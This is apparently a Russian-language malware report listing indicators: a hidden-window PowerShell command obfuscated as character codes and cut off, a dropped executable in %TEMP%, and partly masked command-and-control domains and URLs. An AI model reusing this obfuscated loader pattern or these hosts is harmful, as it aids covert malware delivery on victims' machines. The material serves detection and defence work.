Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -c function a($a){ return [char]$a; };$uyeg='';59,105,102,40,40,40,71,101,116,45,87,109,105,79,98,106,101,99,116,32,45,99,108,97,115,115,32,87,105,110,51,50,95,67,111,109,11...
- %TEMP%\jucheckx64.exe
- 'ro##.##sticsandbox.com':80
- http://ro##.##sticsandbox.com/reload?bh###
- DNS ASK dr###.##escreationstore.com
- DNS ASK ro##.##sticsandbox.com